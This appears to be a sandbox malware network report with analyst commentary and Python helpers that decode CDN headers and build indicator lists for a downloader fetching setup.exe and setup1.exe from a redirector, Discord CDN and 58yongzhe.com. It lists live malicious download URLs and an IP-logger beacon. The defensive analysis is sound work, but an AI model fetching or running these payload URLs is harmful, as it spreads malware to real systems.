Network Analysis

Summary of the capture (2024-08-18, sandbox host 192.168.56.103): the sample fetched a Pastebin raw paste and downloaded two executables over HTTP, setup.exe (7,620,713 bytes) from the Discord CDN via a 302 from http://194.58.114.223/d/385104 and setup1.exe (270,336 bytes) from http://58yongzhe.com/parts/setup1.exe. Two further fetches, https://yip.su/RNWPd.exe and the https://iplogger.com/1lyxz tracking link, were stopped by Cloudflare challenge pages. Every request carries only Host and Connection headers (no User-Agent). There was no ICMP or IRC traffic and no Suricata or Snort alert fired.
Name | Response | Post-Analysis Lookup |
---|---|---|
58yongzhe.com | 62.133.62.93 | |
yip.su | 172.67.169.89 | |
pastebin.com | 104.20.4.235 | |
cdn.discordapp.com | 162.159.133.233 | |
iplogger.com | 172.67.188.178 | |

The table records one address per name. The TLS flows further down connected to 104.20.3.235 for pastebin.com and 162.159.130.233 for cdn.discordapp.com, different Cloudflare edges from the ones listed here, so correlate flows by hostname or certificate name rather than by these single addresses.
TCP Requests
No entries are listed under TCP Requests in this export; the TCP connections of the run are visible as the HTTP transactions and the Suricata TLS flows below.
UDP Requests
Source | Destination | Service |
---|---|---|
192.168.56.103:50800 | 164.124.101.2:53 | DNS |
192.168.56.103:52760 | 164.124.101.2:53 | DNS |
192.168.56.103:53673 | 164.124.101.2:53 | DNS |
192.168.56.103:62576 | 164.124.101.2:53 | DNS |
192.168.56.103:64894 | 164.124.101.2:53 | DNS |
192.168.56.103:137 | 192.168.56.101:137 | NetBIOS Name Service |
192.168.56.103:137 | 192.168.56.255:137 | NetBIOS Name Service (broadcast) |
192.168.56.103:138 | 192.168.56.255:138 | NetBIOS Datagram Service (broadcast) |
192.168.56.103:62579 | 239.255.255.250:1900 | SSDP (multicast) |

The five DNS queries to 164.124.101.2 correspond to the five names in the DNS table. The NetBIOS and SSDP datagrams are the guest OS's normal LAN discovery traffic and cannot be attributed to the sample from this capture alone.
GET https://pastebin.com/raw/E0rY26ni (200 OK)
Request:
GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Sun, 18 Aug 2024 05:11:22 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 730
Last-Modified: Sun, 18 Aug 2024 04:59:12 GMT
Server: cloudflare
CF-RAY: 8b4f671fcd0a29e6-FUK

The paste is plain text last modified at 04:59:12 GMT, twelve minutes before this run, and was served from Cloudflare's cache (Age 730). Its content is not reproduced in this report; raw pastes fetched this early in a run typically carry configuration or download URLs, so the paste body should be pulled from the PCAP or the sandbox's HTTP bodies before it is removed.
GET https://yip.su/RNWPd.exe (403 Forbidden)
Request:
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 18 Aug 2024 05:11:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: s6M+4X7FkG3QckaDoqpDiwoJ3LTSYT4JdD8SXKK0RNbLL6LbSp0zFFqKieqDJLDo0bm34biCJbg4GnSHutZYwkPAcRwhZawrdnTqksYoGWU=$2iTjo7sRDzRpvNHXfwPNUQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYfasVUS3aOmEKK87Vn7agXGGQjZIdGMBtsqFHQDOTTDTDwOm1yPL6xcnC%2FCH4x9BqdKih3vULnbNaDUXdcI2Iho50gvYlVijxQDLpYh04kqdiGLuWNa%2BbY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b4f6722bf0c52b9-LAX
alt-svc: h3=":443"; ma=86400

This 403 is a Cloudflare bot-management challenge (cf-mitigated: challenge, cf-chl-out), not a response from the origin: a bare HTTP client that sends only Host and Connection headers cannot pass it. The capture therefore says nothing about whether RNWPd.exe was actually hosted at this path; retrieve it separately with a browser-like client if the second-stage file is needed.
GET https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f& (200 OK)
Request:
GET /attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Sun, 18 Aug 2024 05:11:23 GMT
Content-Type: application/x-msdos-program
Content-Length: 7620713
Connection: keep-alive
CF-Ray: 8b4f6723bc14c107-ICN
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 3733
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="setup.exe"
ETag: "43a4c130cb9c41aee2554d613e1f8be7"
Expires: Mon, 18 Aug 2025 05:11:23 GMT
Last-Modified: Sun, 18 Aug 2024 04:08:00 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1723954080615474
x-goog-hash: crc32c=tJdZDw==
x-goog-hash: md5=Q6TBMMucQa7iVU1hPh+L5w==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7620713
x-guploader-uploadid: AHxI1nO2_BEbhH0G3g4PZk4KfJRVhkDgSeOBjWGXAFriuwWaK4BY5YCmDyyNlq5t1yWvr1t-Z0mt0YlBlA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=CS2Zx5wF35wO0EwyCNx9wELCJy8M6rccc2D_nVpqnPk-1723957883-1.0.1.1-1X8hsCyzE4ryAOfmP_3UWhYx7ycZNcnYSJ0QlXm223iUcEvf7x7QV4.blegXRELCJ2JZLxb0dE_5R4VxL28CBA; path=/; expires=Sun, 18-Aug-24 05:41:23 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1NbxUF6naEVic%2FVMCUYyp41V5l%2BkhjSKnVpPea5NC4i7zqCp3KilLuL0ijXHqoVQGLBBEgaQX3pz97ppPLkSB6h8OJOg0dpyjm%2BssblzmjRgVcFuTcvnRlfXBGb5E%2FHBkpCLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=a1beOUWUEwaMZ31uQSSXK25uqnUXOvXBUr9HjGeAX1g-1723957883524-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare

The file is served by Google Cloud Storage behind Cloudflare (x-goog-* headers). x-goog-hash md5=Q6TBMMucQa7iVU1hPh+L5w== is the base64 form of 43a4c130cb9c41aee2554d613e1f8be7, the same value as the ETag, so the MD5 of the 7,620,713-byte setup.exe is known from the headers alone and can be looked up before the dropped file is examined. Last-Modified 04:08:00 GMT is the upload time; the URL's is=66c173a0 is that same instant as a hex Unix timestamp and ex=66c2c520 is exactly 24 hours later, after which this signed attachment link stops working.
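Because the Discord CDN response carries Google Cloud Storage object headers, the payload's stored digests and the link's validity window can be recovered without the body. The Python below is a worked example added to this write-up, not part of the sandbox report; it decodes the headers and URL copied from the transaction above. Treating the `is` and `ex` query parameters as hex Unix timestamps is an assumption about the Discord CDN link format, one that the Last-Modified header confirms for this capture.

```python
import base64
import binascii
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from urllib.parse import parse_qs, urlsplit

# URL and response head copied from the cdn.discordapp.com transaction in the
# report above, reduced to the headers this example uses.
PAYLOAD_URL = (
    "https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/"
    "setup.exe?ex=66c2c520&is=66c173a0"
    "&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f&"
)
RAW_RESPONSE = """HTTP/1.1 200 OK
Date: Sun, 18 Aug 2024 05:11:23 GMT
Content-Type: application/x-msdos-program
Content-Length: 7620713
Content-Disposition: attachment; filename="setup.exe"
ETag: "43a4c130cb9c41aee2554d613e1f8be7"
Last-Modified: Sun, 18 Aug 2024 04:08:00 GMT
x-goog-hash: crc32c=tJdZDw==
x-goog-hash: md5=Q6TBMMucQa7iVU1hPh+L5w==
x-goog-stored-content-length: 7620713
"""


def parse_response(raw):
    """Split a raw HTTP/1.1 response head into (status_code, [(name, value), ...]).
    Repeated headers are kept in order: x-goog-hash appears once per digest."""
    lines = raw.strip().splitlines()
    status_code = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status_code, headers


def header(headers, name, default=None):
    """First value of a header, matched case-insensitively."""
    for key, value in headers:
        if key == name.lower():
            return value
    return default


def stored_digests(headers):
    """Decode every x-goog-hash header ('algo=base64(raw digest)') to lowercase hex.
    GCS sends both the crc32c and the md5 of the stored object."""
    digests = {}
    for key, value in headers:
        if key != "x-goog-hash":
            continue
        algo, _, b64 = value.partition("=")  # split on the first '=' only; the
        digests[algo] = binascii.hexlify(base64.b64decode(b64)).decode()  # rest is base64
    return digests


def etag_md5(headers):
    """Unquoted ETag; in this capture it equals the hex MD5, which is checked, not assumed."""
    etag = header(headers, "etag")
    return etag.strip('"') if etag else None


def link_window(url):
    """Decode the signed-link parameters. Assumption: `is` and `ex` are hex Unix
    timestamps (issued / expires) and `hm` is the signature over them."""
    params = parse_qs(urlsplit(url).query)  # the trailing '&' yields no pair
    issued = datetime.fromtimestamp(int(params["is"][0], 16), tz=timezone.utc)
    expires = datetime.fromtimestamp(int(params["ex"][0], 16), tz=timezone.utc)
    return issued, expires


def payload_facts(url, raw_response):
    """Everything about the payload that can be asserted from headers alone."""
    status, headers = parse_response(raw_response)
    digests = stored_digests(headers)
    issued, expires = link_window(url)
    uploaded = parsedate_to_datetime(header(headers, "last-modified"))
    return {
        "status": status,
        "size": int(header(headers, "content-length")),
        "md5": digests.get("md5"),
        "crc32c": digests.get("crc32c"),
        "etag_is_md5": etag_md5(headers) == digests.get("md5"),
        "uploaded": uploaded,
        "link_issued": issued,
        "link_expires": expires,
        "link_issued_at_upload": issued == uploaded,
        "link_lifetime": expires - issued,
    }


if __name__ == "__main__":
    for key, value in payload_facts(PAYLOAD_URL, RAW_RESPONSE).items():
        print(f"{key:22} {value}")
```

Run stand-alone it reports MD5 43a4c130cb9c41aee2554d613e1f8be7 (equal to the ETag), crc32c b497590f, and a link issued at 2024-08-18 04:08:00 UTC, the upload instant, with a 24-hour lifetime; the same routine applies to any Discord CDN attachment seen in a capture, which is useful when the body was not saved.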
GET https://iplogger.com/1lyxz (403 Forbidden)
Request:
GET /1lyxz HTTP/1.1
Host: iplogger.com
Connection: Keep-Alive
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 18 Aug 2024 05:11:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 0YCSjC8EKXtOCpB7dSgU2+rUYuJIBgI1uekChZhhMIJTXBw/+UiNiEYA0ALloAg7394NkH6TlaunQXWxk4G96avGrmS8HMZmfnZY7CijPOTyMOVN0u8D3dKQhKzNnxHWMQLNHXQe9sp+/NceCf787w==$nEGGbLujxwlwAHLxmEyjJg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTEEcl7j3QIMW9fHcOApWfj6F%2Fx3695AkyS4AMPXRTA9Iw8x9TwZjbb9%2B2xX8aUIFIjYIM9F%2B7nGoEedwqLrsKHvyl8liEEncA%2FyRDKIHnB9Ok%2FfPkg4bKAVSSO7JGU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b4f6762bef57ed5-LAX
alt-svc: h3=":443"; ma=86400

The same Cloudflare challenge as for yip.su. iplogger.com short links exist to record the IP address of whoever opens them; this request is made ten seconds after the payload downloads (05:11:33 against 05:11:23), consistent with a victim-counting beacon rather than a further download.
GET http://194.58.114.223/d/385104 (302 Found)
Request:
GET /d/385104 HTTP/1.1
Host: 194.58.114.223
Connection: Keep-Alive
Response:
HTTP/1.1 302 Found
Server: nginx
Date: Sun, 18 Aug 2024 05:11:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f&

Plain HTTP to an IP-literal host. The nginx redirector answers with a Location that is exactly the signed Discord CDN URL fetched above, and its Date (05:11:22) precedes the CDN fetch (05:11:23), so the expiring Discord link was obtained from this redirector at run time; the report lists the transactions out of chronological order. The redirector, not the CDN link, is the stable artefact to block and monitor.
GET http://58yongzhe.com/parts/setup1.exe (200 OK)
Request:
GET /parts/setup1.exe HTTP/1.1
Host: 58yongzhe.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Sun, 18 Aug 2024 05:11:23 GMT
Server: nginx/1.26.1
Content-Type: application/x-dosexec
Content-Length: 270336
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

A second executable (application/x-dosexec, 270,336 bytes) downloaded over plain HTTP from an nginx host that resolves to 62.133.62.93, an address outside any CDN. Unlike the Discord CDN response there are no stored-object hashes in the headers, so this file has to be hashed from the sandbox's dropped files or carved from the PCAP.
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49164 -> 104.20.3.235:443 | C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | e3:4a:2e:16:cc:2b:72:f6:c5:22:3e:52:49:b3:50:2a:1b:85:6f:8b |
TLS 1.2 192.168.56.103:49165 -> 172.67.169.89:443 | C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49170 -> 162.159.130.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
TLS 1.2 192.168.56.103:49193 -> 172.67.188.178:443 | C=US, O=Google Trust Services, CN=WE1 | CN=iplogger.com | ff:db:b3:bf:95:97:b5:c1:dd:90:3f:4c:9a:d3:69:3b:39:78:66:96 |

The fingerprint column is the 20-byte SHA-1 of the leaf certificate. All four flows go to Cloudflare-fronted names whose certificates match the requested host (the CN discordapp.com covers cdn.discordapp.com), and two of them connect to edges other than the A record in the DNS table above (104.20.3.235 against 104.20.4.235, 162.159.130.233 against 162.159.133.233). The plain-HTTP hosts 194.58.114.223 and 58yongzhe.com do not appear here because they never negotiated TLS.
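The DNS table records one address per name while the TLS flows reached different Cloudflare edges for two of those names, which matters when the report is turned into indicators: a shared CDN edge is not a useful IP to block, whereas the non-CDN hosts are. The Python below, an example added to this write-up rather than part of the sandbox report, correlates the two tables by certificate name and separates hostnames from IP indicators; the Cloudflare ranges embedded in it are an assumed subset of Cloudflare's published IPv4 list, sufficient for the addresses in this capture.

```python
import ipaddress

# DNS answers (Name -> Response) and TLS flows (destination IP, certificate CN)
# copied from the two tables in the report above.
DNS_ANSWERS = {
    "58yongzhe.com": "62.133.62.93",
    "yip.su": "172.67.169.89",
    "pastebin.com": "104.20.4.235",
    "cdn.discordapp.com": "162.159.133.233",
    "iplogger.com": "172.67.188.178",
}
TLS_FLOWS = [
    ("104.20.3.235", "pastebin.com"),
    ("172.67.169.89", "yip.su"),
    ("162.159.130.233", "discordapp.com"),
    ("172.67.188.178", "iplogger.com"),
]
# Hosts contacted over plain HTTP in the report (one IP literal, one name).
HTTP_HOSTS = ["194.58.114.223", "58yongzhe.com"]

# Assumption: a subset of Cloudflare's published IPv4 ranges (cloudflare.com/ips)
# covering the addresses in this capture; refresh from the live list before reuse.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in
                 ("104.16.0.0/13", "172.64.0.0/13", "162.158.0.0/15")]


def is_ip_literal(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def is_cdn_edge(ip):
    """True when the address belongs to a shared CDN range (here: Cloudflare)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)


def name_for_cert(cn, names):
    """Map a certificate CN back to the name the sample resolved: exact match or a
    subdomain of it (cdn.discordapp.com is covered by CN=discordapp.com)."""
    for name in names:
        if name == cn or name.endswith("." + cn):
            return name
    return None


def correlate(dns, flows):
    """One row per TLS flow: the resolved name it belongs to, whether the IP actually
    connected differs from the single DNS answer recorded, and whether that IP is a
    CDN edge (in which case only the hostname is a durable indicator)."""
    rows = []
    for dst_ip, cn in flows:
        name = name_for_cert(cn, dns)
        rows.append({
            "name": name,
            "cert_cn": cn,
            "connected_ip": dst_ip,
            "dns_answer": dns.get(name),
            "ip_differs_from_dns": dns.get(name) != dst_ip,
            "cdn_edge": is_cdn_edge(dst_ip),
        })
    return rows


def indicators(dns, flows, http_hosts):
    """IOC set an analyst can act on: every hostname, plus only those IPs that are
    not shared CDN edges (blocking 104.20.3.235 would hit all of Cloudflare)."""
    hostnames = set(dns) | {h for h in http_hosts if not is_ip_literal(h)}
    ips = {row["connected_ip"] for row in correlate(dns, flows) if not row["cdn_edge"]}
    for host in http_hosts:
        ip = host if is_ip_literal(host) else dns.get(host)
        if ip and not is_cdn_edge(ip):
            ips.add(ip)
    return {"hostnames": sorted(hostnames), "ips": sorted(ips)}


if __name__ == "__main__":
    for row in correlate(DNS_ANSWERS, TLS_FLOWS):
        print(row)
    print(indicators(DNS_ANSWERS, TLS_FLOWS, HTTP_HOSTS))
```

For this capture the only IP-level indicators are 194.58.114.223 and 62.133.62.93; everything else sits on Cloudflare edges. Note also that pastebin.com and cdn.discordapp.com are shared services, so for those the full URL path (the paste ID and attachment path above) rather than the hostname is the artefact worth blocking or hunting for.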
Snort Alerts
No Snort Alerts